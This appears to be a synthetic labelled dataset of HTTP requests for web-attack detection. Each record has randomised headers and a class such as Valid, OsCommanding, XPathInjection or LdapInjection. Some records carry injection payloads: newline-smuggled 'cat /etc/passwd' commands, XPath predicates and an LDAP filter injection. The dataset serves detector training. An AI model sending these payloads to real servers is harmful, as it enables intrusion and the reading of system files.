If-None-Match: *
If-Range: *
Max-Forwards: 250
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Digest response="56FFddd048DB85AF437AF9E1cF7F3afc"
Authorization: Digest nonce
Range: 623768-8270,-361888,-69728
Referer: http://sh1eggya.de/tqbteet/vmehhe/mlllsfgo/uesx/nmoteon.bin
TE: trailers,trailers,chunked
Trailer: Cache-Control
User-Agent: Mozilla/4.0 (compatible; Konqueror/1.4; Unix; XsuNaodc6w)
UA-CPU: x86
UA-Disp: 9904,9912,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 3246x5463
Via: 2.4 145.191.48.180, 9.0 234.100.72.80, FTP/6.9 60.0.106.14
Transfer-Encoding: identity
Upgrade: iTroe/7.1, yYgPs/3.4
Warning: 029 www.ldelcm.jpg "mt7u16ipeiusedskeu1" 
X-Forwarded-For: 77.62.199.33
X-Serial-Number: 11691729475
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Ss3tr8nNa=2055&nthse=iootd&orew=eDc&gx=813&atrIehwutio=vhphi4rEsseelrlfE&dra=ddgs8lna~nwiavbscript&yTeo82evlN8ci4=it&mrk8aausese=evBz&el4r=sJ-MrUWb&rrhgridh3g4=neeg 7~admin2rsiah&jJlyDWxL0S=uP517JJs

End - Id: 34842
Start - Id: 43477
class: OsCommanding
GET /prjnin3esbogvrp/lu/rg7prKhdZ01/rniT5eIutepoy6/wrgmxYPhPWt/jLbr7c/cfeosTe1kmalkmvtse7/acle/i-alUz2hGWBBzTcul/3lseaTgvmc.php?styiEwdEB0ea=9ZDH&QZhP5WpEun=081240875&N8vmouvMU=4&Smnians9ot7ehO=Peul2Nawwyd%5D&9HwUFDdeletesKG=%250a+++cat++++%250a++++%2Fetc%2Fpasswd%250a&Hj-M=00412&css=tfnth4noet&hza=f0_G&ceB=5nngehbtq&3rpndU=245198&piotpse8Irer2=48&Mwindow.openyfImYY=5oan%255 HTTP/1.0
Host: 119.41.177.53
Connection: f384gety
Accept: audio/*;q=0.3, text/plain;q=0.9, application/rtf
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: tret-9perrh, eogD4g-age7r;q=0.8, e-2oOnNlwd, umywv-t1vhxnr, e-rlunESse
Cache-Control: no-store
Client-ip: 166.169.65.71
Cookie: nymxrq0simr5a9s=yNp;gbpEod=956649;mFra8eDinboe40o=osi;nrgom8s=11810;ahn06ene=hnny
Cookie2: $Version="2"
Date: Wed, 16 Nov 05 12:00:56 CET
ETag: "EKy5TlVsnhNKFxx1BRT"
Expect: Nlrhate=Eej0hh;etio=etesUr0
From: t3bs@fsiaebtorf.it
If-Modified-Since: Sun, 18 Feb 07 05:54:32 CET
If-Unmodified-Since: Mon, 23 Jun 08 14:42:33 CET
If-Match: "7sqdJP9DDIZoecM-"
If-None-Match: "iEbCkaeVHu-qF9Sb0L5."
If-Range: *
Max-Forwards: 2
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Digest username="ncuenm"
Authorization: Digest qop=auth
Referer: /netgsh/r6If0nh1.jsp
TE: gzip,chunked;q=0.4
Trailer: Range
User-Agent: iSYWezl-LR http://www.sxonhak.st
UA-CPU: Sparc
UA-Disp: 6546,0956,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 2941x889
Via: 6.2 www.g1nTrsh.gif, FTP/8.7 www.dHa6Ans.shtml, 6.4 www.iuyt.shtml
Transfer-Encoding: deflate
Upgrade: lrtrnn/3.5
Warning: 847 www.0te1.css "ctnpcrbrylblaepn" "Wed, 02 Aug 06 09:38:06 UTC"
X-Serial-Number: 67894018714393
----: -----------------------------

null

End - Id: 43477
Start - Id: 43076
class: OsCommanding
POST /u2q2jxF1RzOm5/sWKebrHM/6Vk/TpFY/rfteuj/hTthaR/Laar7zv0o/ofsFsp.Rnjv/0tiiaepP/e@WWSX/tcphan.mdb? HTTP/1.0
Content-Length: 72
Content-Language: gef,orhw1nl
Content-Encoding: deflate
Content-Location: http://srntie.st/ATe9a/5eq2lEli/5moccaji/n8n0equ/deee2Ar.pl
Content-MD5: aGhhZW90dG5uMXdob3RuTg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 19 May 05 24:17:51 CET
Host: www.tfi3g.st
Connection: keep-alive
Accept: image/*;q=0.1, application/rtf
Accept-Charset: iso-8859-7, isiri-3342, us-ascii;q=0.0
Accept-Encoding: gzip, identity, compress, identity;q=0.3
Accept-Language: w8w-MnasnaT, reib-ei3neBwo, av-ee9sTgx;q=0.7
Cache-Control: max-age=3
Cookie: Vopeninput-lkK29=6138549;F0u3ifnqe=qewinntDe(a;osaosNttb9l=eiftutrfhno;awto3unals=hexcgttbodyiO
Cookie2: $Version="0"
Date: Sun, 16 Nov 08 06:48:55 UTC
Expect: 100-continue
From: gweat@cOEisd.cz
If-Modified-Since: Sat, 05 Nov 05 05:24:27 CET
If-None-Match: "z-v_VeDmzp2WdrNt"
If-Range: "evnKTBNdJ-xv1QE"
Max-Forwards: 765
Referer: http://www.iijritt.be/Rmnp/Cnanfsb/qnb7hwe/a4sae.wmn
User-Agent: irTUauudet/2.0.6
UA-OS: Win98
Via: HTTP/0.4 188.47.93.132, 4.0 143.17.60.199:2
~~~~~: ~~~~~~~~~~~~~~~

ehJ=%0a     cat     %0a     /etc/passwd %0a&sehou1ehmasoi5g=ic

End - Id: 43076
Start - Id: 18231
class: Valid
GET /aEyb6kxnakwn/eotso0/PtbS9ALS/cXyUT2.lO.Uaq/1.c8s1mVU2ih@.gif? HTTP/1.1
Host: www.tolg6tn.de:80
Connection: keep-alive
Accept: application/*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: max-age=16286
Client-ip: 99.184.228.130
Cookie: lEfi=eemvea;reud=18507951;Aghxsks=rsEa;43e=nltai4l;tifmzemi7vdf=te2LntadivTceoEmn
Cookie2: $Version="6"
Date: Fri, 06 Jun 08 18:00:12 UTC
ETag: W/"xVLM-ZC4hTWiDr0C_fb@"
Expect: o7nd=orytnxr
From: hdyWf@e1t0unenyl.ch
If-Modified-Since: Sat, 08 Apr 06 14:35:01 GMT
If-Unmodified-Since: Fri, 10 Oct 08 24:48:46 CET
If-Match: *
If-None-Match: *
If-Range: "li3S8q8Z86yhtYYqQf"
Max-Forwards: 7
MIME-Version: 0.2
Pragma: yr='Enp'
Proxy-Authorization: Basic dGV0OGVkazp0aW9scQ==
Authorization: smriR arali=oYH8oaid
Range: 7902-
Referer: http://OojRi.biz/zSoha/tncoasd/idaeI/cttn5ebn.php3
TE: gzip,chunked
Trailer: If-Modified-Since
User-Agent: Mozilla/2.9 (Windows; U; Windows NT 4.7; 4c-j9; rv:5.5.3) Gecko/08578715
UA-CPU: PowerPC
UA-Disp: 202,576,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 810x317
Via: asem/0.4 www.qoomF.jpg, FTP/1.8 228.27.66.73
Transfer-Encoding: gzip
Upgrade: hicew/7.4, 1ok/5.7, 4ba/6.1, Inm/8.9, hutr/5.7
Warning: 162 215.73.103.201 "k5qlycso5ziN" 
X-Forwarded-For: 164.38.194.242
X-Serial-Number: 104634780
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18231
Start - Id: 24012
class: Valid
GET /c9Y@OR_s59cE3FX_i/tkToBsQesWfj5Mm.htm?sne=E4di2ithu4zov&bh=qsh&wrhsTilfsc02n=617682&R_QhDformSevalOS=el5smddn5Layhh8e&ktdrAffx=21&vate=668 HTTP/1.1
Host: www.uhfp.gov
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: x-mac-hebrew;q=0.0
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: min-fresh=20
Client-ip: 172.138.38.160
Cookie: tna3mtabRt=92;yeuoeLetBddauo=47615;tifxp=2353204253;hi2dTodia=roo13hyrswaku;ytas6=nmh2ooa
Cookie2: $Version="723"
Date: Tue, 23 Jun 09 09:40:38 CET
ETag: W/"rrN47qd-MBKlOC65"
Expect: 100-continue
From: 8ihnedd@EsreI51e7i.com
If-Modified-Since: Thu, 21 Dec 06 10:53:08 UTC
If-Unmodified-Since: Fri, 09 Jan 09 11:24:51 CET
If-Match: *
If-None-Match: "5BmYflWwLSqvHxEQq@B"
If-Range: Tue, 26 May 09 12:38:38 CET
Max-Forwards: 1
MIME-Version: 2.5
Pragma: tNmn2pam='rndul'
Proxy-Authorization: NTLM cmhlYWVtbHJobkV5ZGVvaGl0U2Nzd28yemVvbGFyZlRoZTdRaGxSYXg=
Authorization: 6cerjm bhQnwadi=nocvi
Range: -037415,0231-990,54-43391
Referer: /Et4E/thx9ti/eRskthO.php4
TE: trailers,gzip;q=0.9
Trailer: Date
User-Agent: Mozilla/1.6 (Windows; U; Windows NT 5.3; to-ta; rv:0.4.9) Gecko/99154468
UA-CPU: PowerPC
UA-Disp: 4414,5382,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 174x179
Via: its/9.1 www.seoos.js:95, 2.0 164.244.196.184
Transfer-Encoding: identity
Upgrade: berd/1.6
Warning: 468 102.124.44.220 "QreG49doDa" 
X-Forwarded-For: 160.213.124.93
X-Serial-Number: 54119
----: ------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 24012
Start - Id: 48511
class: XPathInjection
PUT /oeip_W1lea_G@Vl/var3N/6rwxdzamacf.shtml? HTTP/1.1
Content-Length: 202
Content-Language: ae,3tcSitec
Content-Encoding: deflate
Content-Location: /huweAn/dsfepnmi/duo0i.gz
Content-MD5: SmVlM29jYW91TjBsZWh0bw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 21 Sep 08 11:17:15 CET
Last-Modified: Sat, 27 Feb 10 05:37:09 GMT
Host: 226.87.228.235
Connection: close
Accept: text/*, application/rtf;q=0.8
Accept-Charset: *
Accept-Encoding: identity;q=0.3, compress;q=0.1, gzip, gzip
Accept-Language: nOur-eu;q=0.1, whins-Xzn51mi;q=0.3
Cache-Control: min-fresh=1
Client-ip: 117.212.24.161
Cookie: 7l=3vE;e1eXvbscriptLEU=104;sht=dhTdter9snlin8hc;paa8qitL8ahuki=39044;rn=of
Cookie2: $Version="5"
Date: Fri, 16 Mar 07 03:37:35 UTC
ETag: W/"Z8k6MID8rdOhM91kgfF"
Expect: pdaiytge=ttintxkT;rkEAm
From: 3eaqc@eaed.ch
If-Modified-Since: Tue, 21 Oct 08 18:57:20 CET
If-Unmodified-Since: Tue, 22 Feb 05 22:54:44 GMT
If-Match: "sL-.ub@Kc3k8_9X"
If-None-Match: "i6Iqiqk8zkfj3fKu"
If-Range: "DQxam.gceadvbjdp"
Max-Forwards: 1
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Digest opaque="toiqs"
Authorization: NTLM dE5yYmxvMXJlYW5lYmNuSHNBYXN0ZGF1RGxlcDBJQmMzT0ls
Range: 811682-312,0-
Referer: http://uamtosa.st/edoaL/0y2s7tEp/eegShgs/4ttnctF/erptnth.pl
TE: trailers
Trailer: From
User-Agent: 8mRlh_s_Sh http://www.ssn1use.uk
UA-CPU: 68000
UA-OS: Solaris
UA-Pixels: 099x8591
Via: HTTP/6.9 www.bqho.jpg:84128, FTP/4.0 217.165.64.207
Transfer-Encoding: deflate
X-Forwarded-For: 104.189.251.216
X-Serial-Number: 7572286452988
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

ynTlEvats=(i     <   count(dmt0s/child::text())   and  j  <     count(flcod/child::comment())  and     k    < count(etnHl/child::*)     )&E_2f-D0=eo3etitr

End - Id: 48511
Start - Id: 4622
class: Valid
PUT /at/u4xrhhgdsryaoIe/3KDD86B1RtGRQk09EtXK/ezJ.VYC/1vN/dnS/eh8PluFsveA.D1rPHB/mtgeRieldofGThnr/fco/reklcsfe0mnnfn6vxO/nviee1dhyddqIrD5i/cejLHn@NmXw32K.pl? HTTP/1.0
Content-Length: 82
Content-Language: e,ord
Content-Encoding: gzip
Content-Location: http://rsuhsn.uk/ikGe.shtml
Content-MD5: dHNhdGE5SWp0aXRuc2lyYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 27 Sep 09 01:02:58 GMT
Last-Modified: Mon, 07 Jan 08 06:13:48 CET
Host: 242.88.144.123
Connection: close
Accept: text/*;q=0.7, video/mpeg, text/*
Accept-Charset: *;q=0.3
Accept-Encoding: compress
Accept-Language: ib2-zjSsn
Cache-Control: min-fresh=3
Client-ip: 90.254.224.52
Cookie: delete@gI=ksttsrcpih)$zpRI;ht0se=0wehoi7sbcjada6mb
Cookie2: $Version="2"
Date: Wed, 24 Feb 10 24:44:16 UTC
ETag: W/"P_WONZyQXhYLRNgRuG"
Expect: uttnvaat
From: 9Gep2Hrs@icRis7.net
If-Modified-Since: Fri, 17 Jun 05 17:29:10 CET
If-Unmodified-Since: Tue, 24 Mar 09 23:05:21 UTC
If-Match: "cm7R7oDiJuHaxDrfU"
If-None-Match: "tGZ5ZYZIj5FaN4Yc0aB"
If-Range: Tue, 31 Aug 04 23:50:26 CET
Max-Forwards: 71
MIME-Version: 3.4
Pragma: way=o5l
Proxy-Authorization: Basic bmF5bjcxZzpoSXJybmVv
Authorization: Basic b2NtZTphbnl5
Range: -0,-2986,-51980
Referer: /eTaeoYes/tfa5bNe.conf
TE: trailers,deflate
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.0 (Windows; U; Win 9x 5.6; 1B-1w; rv:1.7.5) Gecko/91746307
UA-CPU: Sparc
UA-Disp: 183,1102,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 834x094
Via: 9.7 183.231.89.133, HTTP/8.0 www.goseea.htm
Transfer-Encoding: identity
Upgrade: Gdio/3.6, ryun/2.6, scha/8.3
Warning: 848 215.17.207.198:27 "dhaswCc" "Tue, 17 Feb 09 02:45:11 CET"
X-Forwarded-For: 71.251.211.91
X-Serial-Number: 94988
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

6wmaenQeip=7103210&rowDcaq=531&rrEizd7o9utf=1909333&sneE5aaaeoctltp=ol&bicCn=eadPr

End - Id: 4622
Start - Id: 38485
class: LdapInjection
GET /rczJBjrZkEOH@Y/ewjsqyb1zBOoJMHufkf/lhen/1Nwgroup bymunionx/oRnr.htm?ernHhjnh44=%29++++%28++%7C%28+++cn%3D*o%27brien*%29%28mail+++%3D*o%27brien*%29+++&nemmadeegew=pa%3C%3A8k&epcmoesa=ebinga HTTP/1.0
Host: www.rmmnIn.ch:432
Connection: close
Accept: application/zip, video/*;q=0.6, video/quicktime;q=0.6
Accept-Charset: iso-8859-6, x-mac-cyrillic
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: min-fresh=597
Client-ip: 50.101.101.125
Cookie: autoexecMxbpUbin7includeXiS=f8C@R4Q
Cookie2: $Version="9"
Date: Sun, 28 May 06 17:27:19 CET
ETag: W/"HdLDJ1hGjmZABeS"
Expect: 100-continue
From: b8antatt@o1neid.cz
If-Modified-Since: Fri, 06 Feb 04 03:52:24 CET
If-Unmodified-Since: Mon, 31 Mar 08 23:37:27 CET
If-Match: *
If-None-Match: "8h86t@gH_M-p_Fva"
If-Range: *
Max-Forwards: 7
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest opaque="kmaaul"
Authorization: Digest opaque="ogrgt"
Range: 900292-227,511-1,719645-073
Referer: http://eueitT.net/swpt/eln2l1fm.swf
TE: chunked,gzip,gzip
Trailer: Authorization
User-Agent: 0tnEi (n3auSCl; nzpT@.ee3; r5RMYa)
UA-CPU: 68000
UA-Disp: 3037,4035,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 6621x951
Via: 4.6 www.ha09siwo.shtml:8588
Transfer-Encoding: identity
Upgrade: Nlohim/6.2, ors/6.8, ine/9.2, aauq/0.7, cvl87u/8.4
Warning: 917 www.ashesmu.htm "elta4zdhaod" "Sun, 11 Jul 04 04:27:49 UTC"
X-Forwarded-For: 21.183.247.173
X-Serial-Number: 8565701730547644653
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38485
Start - Id: 29175
class: Valid
GET /nce53ltdHos/8R/dl/c6D.48XEz0/rax9AVEPbaxeR.P/ec2r5qbit/opBNatTWF7x10X36swu/Iitl40Bnsdudmwt0est/tetocta/rtnaolhlbscoueerohu/bUtdWbK8dqWxz1.jsp?ttilg=g0pHgdmze&J7iqW=siPW&8hehlst7o4urs=4741&abjt4atr=mf&260vm1nnnansie0=%27eaNwinntt%3E4Zlltonctei HTTP/1.0
Host: 242.230.116.59
Connection: yRrs
Accept: image/*;q=0.3
Accept-Charset: iso-8859-2, iso-10646-ucs-2, windows-1255, x-mac-chinesesimp, euc-cn;q=0.6
Accept-Encoding: identity, identity;q=0.9, identity
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 214.229.176.133
Cookie: fAkoeao=c2tit;ioeaErtirce=rit yslo;wu1aeytOcwilqeh=75337;0ulohfdau1enan1=cabgsoundjaH1update~%vu3open;y5ssitgt=97;de=oDfaTlarTTn0
Cookie2: $Version="92"
Date: Mon, 29 Oct 07 14:32:04 UTC
ETag: W/"WQZ3cS6.Prge6jwK8R"
Expect: 100-continue
From: isid9g@sdnytymhq.st
If-Modified-Since: Thu, 16 Feb 06 08:30:35 CET
If-Unmodified-Since: Wed, 11 Jun 08 19:23:33 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 24 Jan 05 14:12:10 UTC
Max-Forwards: 6508
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Digest username="b3ezen4"
Authorization: NTLM dHRwYjBneXNzbEF1dHN0UHlpY2NFbnJpeW5yQ2ZpdGhv
Range: 21-228505,111-,03195-
Referer: http://ebpacm.com/6anb/Mteeg/soctseK/5ucsiln.cfm
TE: trailers
Trailer: Date
User-Agent: Mozilla/4.5 (Machintosh; U; Mac OS X 5.4; mm-hb; rv:7.4.0) Gecko/40307480
UA-CPU: PowerPC
UA-Disp: 2553,984,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 944x565
Via: 3.2 66.197.238.199:87829
Transfer-Encoding: compress
Upgrade: esihx8/9.4, oom/5.8, rliD6z/3.5, eqnao/3.0, hone/5.5
Warning: 010 www.dhr6yno.shtml "sdut2s" 
X-Forwarded-For: 253.181.198.179
X-Serial-Number: 4041973045614
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 29175
Start - Id: 49994
class: XPathInjection
PUT /fA/aMJRRwzemZElZ/wdo81atsoMn/tae6dzo8tetbwnz3.shtml? HTTP/1.0
Content-Length: 270
Content-Language: D,dmsr
Content-Encoding: identity
Content-Location: http://www.wEaei.cz/8wmhem/lilpee/wsee97ie/u5Luk.jsp
Content-MD5: OHM2dGRjT2l0MmZrb2lVdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 15 Jul 06 05:23:58 UTC
Last-Modified: Sun, 11 Oct 09 12:39:42 GMT
Host: www.tqz7aing4.fr
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: gxocwid'  or     lfwx/awn1/child::node()[processing-instruction()=8]  or     'ca8at'=    '
Accept-Language: *
Cache-Control: max-stale
Client-ip: 89.188.193.205
Cookie: ysrtt=eHpVXbFXm;5uovi8Sul1mChci=4;WNf9Oq7b3-C6=7
Date: Thu, 18 Jun 09 07:37:04 CET
ETag: "B@Z_FoQ6sHQt.m-"
Expect: aef0
From: Hrtiy@r0sqSkft.de
If-Modified-Since: Sun, 23 Jan 05 02:03:25 CET
If-Unmodified-Since: Thu, 02 Jul 09 10:21:19 UTC
If-Match: "yyz2SBTKCVsnF8MKL@"
If-None-Match: *
If-Range: Mon, 23 May 05 21:58:39 GMT
Max-Forwards: 400
MIME-Version: 2.4
Pragma: anhe8=t9eenaos
Range: -850,-93,-844
Referer: http://Jgr2.be/efqbusf.jpeg
TE: deflate,deflate;q=0.3
User-Agent: 0redihs/8.0.6.3.3
UA-CPU: x86
UA-Pixels: 957x1532
Via: FTP/9.8 191.115.53.215, 4.9 www.tsHe.js:706
Transfer-Encoding: compress
X-Serial-Number: 7920080126086879316
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

aPRvbscript=Essteh0qk1seA6eir&pe5lRvTts= vbscriptd[adnkSo&osahmenAnyYnsst=98735489&noeIeugumr8=71&o6ernar=toeD7i+gy?ed096&tloo6rreuht2yat=5144&icbtpa=tVosSsnFMRl&ihto=fFQ7DV&ty.Z5HJ47=52&ejhss=8&rt=asbenyil&fqTShome=3765&eudewiia0elsxle=29029&tQR8optNs2so=51489881

End - Id: 49994
Start - Id: 16402
class: Valid
GET /frHnc.mailcmdHformrujxNp/-HQ/46BNlogN6lspassthrufSA/i7HRzD28M/s@sZlw3Q/idrnea.nsf?5s=b&a0sneonstOcc0aE=spasswdehhbaSnnog4&AX608MJ7http=vPIQPsP_pukW&an=aueqeItrrYTownk&tophpow=nYnCIQILJx&irunsatY2=605&peedtnacrix=9&KKL.v=8655&uph3Oiltg9laaau=entE%5C5sHtBji&ToThbAlw5ahdte=t%5Cia9cs&vurmrlnnyL3cimd=t+00l&aldurtlctlfh3rt=e1W&eWsFqeetdNc=74&lhh6e=eusautoexechqoj%3Bgad&itjrej=0773685 HTTP/1.1
Host: 27.42.123.83:82994
Connection: keep-alive
Accept: text/*;q=0.4, audio/basic;q=0.0, text/*
Accept-Charset: x-mac-korean
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 129.156.31.222
Cookie: eThnwac4=0vX;aGorhd=0655;eisaa=aCrHoaCFq
Cookie2: $Version="92"
Date: Tue, 16 Mar 10 21:42:45 UTC
ETag: W/"CT-tqGbM0OAI8Es"
Expect: 100-continue
From: seale@faF5s1.ch
If-Modified-Since: Tue, 15 Sep 09 10:10:09 UTC
If-Unmodified-Since: Fri, 11 May 07 08:12:49 CET
If-Match: "ONStIcmdi1ihdr@2n"
If-None-Match: "aUTotrWjaPQDHG0"
If-Range: Fri, 05 Aug 05 08:00:13 GMT
Max-Forwards: 6441
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: NTLM czJUaTVld0hpZ2gxbjhnbnAyMWd0aTduaXJudWVFUWVydGFpc3M=
Authorization: Digest qop=auth-int
Range: 9-3931
Referer: /aiautsh/cseaari/qkeu3/7tseE.swf
TE: deflate,deflate,gzip;q=0.7
Trailer: From
User-Agent: nmshsnncee/3.6.9
UA-CPU: MIPS
UA-Disp: 227,815,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 9846x663
Via: 5.6 40.174.225.242
Transfer-Encoding: deflate
Upgrade: Or46/0.2, nsn/5.8, nEiiOe/8.0, Tldds/1.2
Warning: 481 www.dsiixEh.shtml:370 "isiipeE" 
X-Forwarded-For: 131.177.35.234
X-Serial-Number: 5481271353118244328
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16402
Start - Id: 29968
class: Valid
GET /t6jh/ppdnOfnysquqloseElq/oe/@G5.1b3lpp0fvbscriptw.htm?mcXObp2lSG8=9i&hrlthqsEu=18&oieebnte7mnsi=hl8im8YId5mY&w_KwD-G=lPCYqAWzMO&samXdTbconnectvY=hEa6pWr&p31s4Ln8d=84255676&nudriE=19u&anxt9nosjEC=eWgPBfFAvhgN&stes=dCwIuoQz&9emu=s&rnhaea=arl%7CEemmgct HTTP/1.1
Host: 223.144.35.151
Connection: tPt1re
Accept: */*
Accept-Charset: x-mac-chinesesimp, x-mac-arabic;q=0.7, iso-8859-3;q=0.2, utf-7;q=0.4
Accept-Encoding: *;q=0.5
Accept-Language: h1htbhh1-O;q=0.0, l05a-eeoo, awk-mmOUw
Cache-Control: max-age=921
Client-ip: 247.18.105.163
Cookie: 6hrzNsjjrx2e=6iGctYZG-;dbsr=ei;mtSrh5dt=7te;ootestn=mscriptoptidocument;7abu=em4Y3z3pL
Cookie2: $Version="9"
Date: Tue, 31 Mar 09 06:43:38 UTC
ETag: W/"hu@1fke@0C9Ln8qFHkn"
Expect: rieTrx
From: nAen2Ew@Xo7tyav4o.biz
If-Modified-Since: Sun, 21 Jan 07 08:37:29 UTC
If-Unmodified-Since: Fri, 21 Mar 08 14:23:04 GMT
If-Match: "_5_V0ueH43PJar0D"
If-None-Match: *
If-Range: Thu, 18 Jan 07 20:17:42 GMT
Max-Forwards: 37
MIME-Version: 0.1
Pragma: g='7tt'
Proxy-Authorization: NTLM c3JhZXRldG1iaW5Dbm15cXRubTVhaGFSOE5ubnRxeHRya01p
Authorization: NTLM ZXVvMmdpcmVybXlubXlhazJuY3F0dGVzbmhhZnN4YWFpRmFvZzY1amxlbDM1
Range: 054604-5
Referer: /kHge/utdbe/sliaiel/aiilo.wav
TE: deflate,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.1 (Machintosh; U; Mac OS X 9.2; ca-Ey; rv:9.2.6) Gecko/52773402
UA-CPU: 68000
UA-Disp: 644,8528,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 797x977
Via: 7.5 53.121.189.61
Transfer-Encoding: identity
Upgrade: eds/9.2, isa/3.3, kej/9.4
Warning: 929 111.138.94.34 "fYos2dhjediq09q9ela" "Sun, 20 Sep 09 07:36:42 GMT"
X-Forwarded-For: 80.188.232.109
X-Serial-Number: 2857393
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29968
Start - Id: 28808
class: Valid
GET /t7F7SaFJ/VNeS3allaA2/e6sFY0HATaZh-elOd/n_utt/exxiUvGRZ@@xRk/YstyleMfc/tg3BCifZGp/tOvAfPlocationscriptmZS/iiqGUSKv8l.png?tsialmarsrsi=8906810&Tsgh7wzlmh=t%401Xnb8zT7&AY7group byKjP=sasno&Nehd=td7ydouei%28R8kan&e6iE7=09050903&s3=yRns%5Ct+&meove4hqsurh=503 HTTP/1.0
Host: www.heMosreN.de
Connection: close
Accept: application/*, application/*, audio/basic;q=0.9
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: aScoRg2n-itaj5tm;q=0.4
Cache-Control: no-transform
Client-ip: 177.57.100.186
Cookie: at=4800981
Cookie2: $Version="987"
Date: Sat, 01 May 04 08:53:44 CET
ETag: "JbKM4dS1tHaN7kkzx"
Expect: 100-continue
From: 4zbw@syof.net
If-Modified-Since: Wed, 13 Sep 06 23:26:51 CET
If-Unmodified-Since: Sun, 14 Oct 07 12:50:45 GMT
If-Match: "El5YD3qi-X6dwj6D.nF"
If-None-Match: "zvg@KPMGWuuEO_YNO"
If-Range: Sun, 04 Dec 05 12:05:32 UTC
Max-Forwards: 5224
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: hdae faMstat=0egsty
Authorization: NTLM bGNhcGQ4d25OaWVuZGFvZWdveHI2b3k0ZW50dHJldWVhc2U1dGw=
Range: -928062,21307-
Referer: /a1ar/yadtT/riedhno/iranal/1ecoTwz.mp3
TE: chunked;q=0.7
Trailer: Via
User-Agent: Mozilla/5.2 (Machintosh; U; Mac OS X 4.4; oI-An; rv:3.0.9) Gecko/49890486
UA-CPU: MIPS
UA-Disp: 587,522,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 405x937
Via: FTP/7.9 www.lpD5A6ro.png, 0.0 222.147.187.126
Transfer-Encoding: Rmidss; cn521eth=ydNpn
Upgrade: dma/7.4, st8cs/3.2, ehL/8.4, tDaep/0.4
Warning: 138 233.42.208.164 "3tpedfslp8rmnsoTea" 
X-Forwarded-For: 1.11.0.97
X-Serial-Number: 39502
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28808
Start - Id: 45180
class: PathTransversal
GET ////? HTTP/1.1
Host: 233.126.118.202:80
Connection: nnCnn
Accept: text/html;q=0.6, audio/x-wav;q=0.2
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=3315
Client-ip: 35.207.4.140
Cookie: teO7mIltat46s=a1pt;wo4=8356503535;Rf1lacceptexecgG=uP6VkU7iZWW;rtEv2law=http=O nr0Qadmintof;cHfcmhspX5=o1duneaitaglc4
Cookie2: $Version="339"
Date: Thu, 23 Nov 06 22:16:33 UTC
ETag: W/"Q9YT7f22enb@zJ0p.VT3"
Expect: 100-continue
From: eeatnnio@srlvirtei.ch
If-Modified-Since: Mon, 08 Sep 08 23:17:43 CET
If-Unmodified-Since: Sat, 15 Aug 09 07:11:54 CET
If-Match: ".fuOe1z2d2KYDMm4xL@d"
If-None-Match: *
If-Range: *
Max-Forwards: 747
MIME-Version: 0.7
Pragma: he='evhsp'
Proxy-Authorization: Digest uri=/teoadOp/uies/ebnnhteb/ariuiir/caepcrnU.pdf
Authorization: Digest nc=9B7EA0Cc
Range: 551-3881,-846
Referer: http://iaqel7.gov/t7dr.conf
TE: trailers,chunked,trailers
Trailer: Accept-Language
User-Agent: Mozilla/4.1 (Windows; U; WinNT 3.9; se-04; rv:0.5.2) Gecko/24996550
UA-CPU: StrongARM
UA-Disp: 370,8487,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 1177x8327
Via: yturh/4.5 www.h1deam.tiff, 1.7 30.81.67.141, 4.8 248.91.215.10
Transfer-Encoding: ziit
Upgrade: nohw/6.9, naqr/4.3
Warning: 826 www.ta4rtlrX.css "e3eAsf" 
X-Forwarded-For: 254.171.174.88
----: -----------------------------------------------
